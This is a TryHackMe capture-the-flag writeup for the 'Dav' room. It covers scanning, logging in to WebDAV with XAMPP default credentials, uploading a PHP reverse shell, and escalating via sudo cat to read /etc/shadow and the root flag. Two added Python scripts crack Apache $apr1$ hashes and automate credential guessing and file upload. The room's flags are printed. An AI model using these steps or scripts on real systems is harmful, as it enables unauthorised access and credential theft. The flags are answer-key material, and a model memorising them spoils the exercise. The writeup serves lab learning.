
TryHackMe Writeup - Dav Room

 ·  ☕ 3 min read  ·  👨‍💻 g4nd1v
Title https://tryhackme.com/room/bsidesgtdav
Description boot2root machine for FIT and bsides guatemala CTF
Difficulty Easy
Maker https://tryhackme.com/p/stuxnet

Nmap

└─$ nmap -sC -sV -oA nmap/dav 10.10.88.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-22 18:51 EST
Nmap scan report for 10.10.88.48
Host is up (0.10s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Only one port is open, 80/tcp, running Apache 2.4.18 on Ubuntu.

It serves nothing but the stock Apache2 default page, so the interesting content has to be somewhere else on the host.


The next logical step is to brute-force directories.

└─$ gobuster dir -u 10.10.88.48 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.88.48
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 299]
/webdav               (Status: 401) [Size: 458]

We found a directory named /webdav, but it answers 401, i.e. it is protected by HTTP authentication and asks for a username and password.


Searching the internet for WebDAV default credentials turned up the XAMPP defaults (https://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html):

user: wampp
pass: xampp

They are accepted by /webdav on this box.

User flag

On the server I found a file named passwd.dav containing an htpasswd-style entry:

wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91

The $apr1$ prefix marks Apache's MD5-based htpasswd format. I was not able to crack it.
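As an added example (not code from the writeup), the block below implements Apache's $apr1$ htpasswd hash in plain Python and tests candidate passwords against the passwd.dav entry quoted above. The page does not say whether the XAMPP default password is the one behind this hash; running the block answers that for the candidates you supply. The candidate list is an assumption.

```python
"""Check candidate passwords against an Apache $apr1$ htpasswd entry (stdlib only)."""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Constructed sample input: the entry from passwd.dav as quoted in the writeup.
PASSWD_DAV_LINE = "wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91"


def _to64(value: int, count: int) -> str:
    """Apache's own base64 variant: 6 bits at a time, least-significant group first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password: str, salt: str) -> str:
    """Apache APR1 hash (md5crypt with the "$apr1$" magic), as written by `htpasswd -m`."""
    pw = password.encode()
    salt = salt[:8]              # at most 8 salt characters are used
    sb = salt.encode()
    magic = b"$apr1$"

    ctx = hashlib.md5(pw + magic + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    pl = len(pw)
    while pl > 0:                # mix in the alternate digest, 16 bytes per password length
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                     # one byte per bit of the password length
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    for i in range(1000):        # deliberate stretching: 1000 rounds of md5
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()

    enc = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        enc += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    enc += _to64(final[11], 2)
    return f"$apr1${salt}${enc}"


def parse_htpasswd_line(line: str):
    """Return (user, salt, stored_hash) for a 'user:$apr1$salt$hash' line."""
    user, _, stored = line.strip().partition(":")
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ entry: " + line)
    return user, parts[2], stored


def check_candidates(line: str, candidates):
    """Return the first candidate whose APR1 hash equals the stored one, else None."""
    _, salt, stored = parse_htpasswd_line(line)
    for cand in candidates:
        # constant-time compare: irrelevant offline, but the right habit for any verifier
        if hmac.compare_digest(apr1_md5(cand, salt), stored):
            return cand
    return None


if __name__ == "__main__":
    # Assumed candidate list; extend it with a wordlist for a real dictionary attack.
    hit = check_candidates(PASSWD_DAV_LINE, ["xampp", "wampp", "password", "webdav"])
    print("match:", hit)
```

The same function reproduces what `htpasswd -m` writes, so it can also be used to confirm a guessed password before spending time on john: a hit here is proof, a miss means the password simply is not in the candidate list.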

I found a blog post on exploiting WebDAV (https://vk9-sec.com/exploiting-webdav/): when the share accepts PUT and we have valid credentials, a PHP reverse shell can be uploaded with cadaver and then triggered from the browser.

└─$ cadaver http://10.10.188.137/webdav
Authentication required for webdav on server `10.10.188.137':
Username: wampp
Password:
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        passwd.dav                            44  Aug 25  2019
dav:/webdav/> put php-reverse-shell.php

With the script's $ip and $port set to our listener and a netcat listener waiting, browsing to the uploaded file (http://10.10.188.137/webdav/php-reverse-shell.php) executes it and we get a shell as www-data.

$ whoami
www-data
$ cd /home
$ ls
merlin
wampp
$ cd merlin
$ ls
user.txt
$ cat user.txt
449b40fe93f78a938523b7e4dcd66d2a
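The WebDAV steps above (find the 401 on /webdav, try the XAMPP defaults, upload a file, fetch it) as an added Python example; this is not the author's code and not the room's. Because it has to run offline it ships with a constructed mock of the share (Basic auth with wampp:xampp, PUT allowed) on a random localhost port; the mock, the credential list and the marker file name probe.php are assumptions, and real Apache mod_dav is only imitated, not reproduced. Point the client functions at http://<target>/webdav/ to use them against a real share.

```python
"""Probe a WebDAV share for PUT, try default credentials, upload and fetch a file."""
import base64
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen


def basic_auth_header(user: str, password: str) -> str:
    """RFC 7617 Basic credentials: base64("user:password")."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def dav_request(url, method, user=None, password=None, body=None, headers=None):
    """One HTTP request; returns (status, headers, body) and never raises on 4xx/5xx."""
    hdrs = dict(headers or {})
    if user is not None:
        hdrs["Authorization"] = basic_auth_header(user, password)
    req = Request(url, data=body, method=method, headers=hdrs)
    try:
        with urlopen(req, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read()
    except HTTPError as err:
        return err.code, dict(err.headers), err.read()


def allowed_methods(url):
    """Methods advertised in the OPTIONS Allow header; PUT is what makes upload possible."""
    _, hdrs, _ = dav_request(url, "OPTIONS")
    return {m.strip().upper() for m in hdrs.get("Allow", "").split(",") if m.strip()}


def try_credentials(url, candidates):
    """Return the first (user, password) pair for which PROPFIND succeeds (200/207)."""
    for user, pw in candidates:
        status, _, _ = dav_request(url, "PROPFIND", user, pw, headers={"Depth": "1"})
        if status in (200, 207):
            return user, pw
    return None


def upload(url, user, pw, content: bytes) -> int:
    """PUT a file (what cadaver's `put` does); 201 Created / 204 No Content mean success."""
    status, _, _ = dav_request(url, "PUT", user, pw, body=content,
                               headers={"Content-Type": "application/octet-stream"})
    return status


class _FakeDav(BaseHTTPRequestHandler):
    """Constructed mock of /webdav: Basic auth with the XAMPP defaults, PUT allowed."""
    USER, PASSWORD = "wampp", "xampp"
    files = {}  # path -> uploaded bytes, shared by all handler instances

    def _authed(self):
        return self.headers.get("Authorization") == basic_auth_header(self.USER, self.PASSWORD)

    def _reply(self, code, extra=None, body=b""):
        self.send_response(code)
        for k, v in (extra or {}).items():
            self.send_header(k, v)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def _deny(self):
        self._reply(401, {"WWW-Authenticate": 'Basic realm="webdav"'})

    def do_OPTIONS(self):
        self._reply(200, {"Allow": "OPTIONS,GET,HEAD,PUT,DELETE,PROPFIND,MKCOL", "DAV": "1,2"})

    def do_PROPFIND(self):
        self._reply(207) if self._authed() else self._deny()

    def do_PUT(self):
        if not self._authed():
            return self._deny()
        self.files[self.path] = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        self._reply(201)

    def do_GET(self):  # the uploaded file is served back, as Apache would serve /webdav/x
        data = self.files.get(self.path)
        self._reply(200, body=data) if data is not None else self._reply(404)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_demo_server():
    """Start the mock on a random localhost port; returns (server, base_url)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _FakeDav)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def run_attack(base_url):
    """The writeup's sequence: OPTIONS, credential check, PUT, then GET the uploaded file."""
    share = base_url + "/webdav/"
    methods = allowed_methods(share)
    creds = try_credentials(share, [("admin", "admin"), ("wampp", "xampp")])
    if creds is None or "PUT" not in methods:
        return methods, creds, None, None
    target = share + "probe.php"  # assumed name; a harmless marker, not a real shell
    put_status = upload(target, *creds, b"<?php echo 'uploaded'; ?>")
    _, _, fetched = dav_request(target, "GET")
    return methods, creds, put_status, fetched


if __name__ == "__main__":
    server, base = start_demo_server()
    print(run_attack(base))
    server.shutdown()
```

The marker file stands in for php-reverse-shell.php: on a real engagement the PUT is the same, only the payload and the listener differ. A PUT answered with 201 or 204 is the confirmation that the collection is writable; a 403 or 405 despite valid credentials means mod_dav is there but uploads are blocked.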

Root flag

sudo -l shows that www-data may run /bin/cat as root without a password.

www-data@ubuntu:/home/merlin$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat

I read /etc/shadow with sudo cat and tried john on the root hash, but it did not crack. Then I remembered: cat runs as root, so there is nothing to crack.

Simply reading the root flag directly works just as well!

www-data@ubuntu:/$ sudo cat /root/root.txt
101101ddc16b0cdf65ba0b8a7af7afa5

Written by g4nd1v, Pentester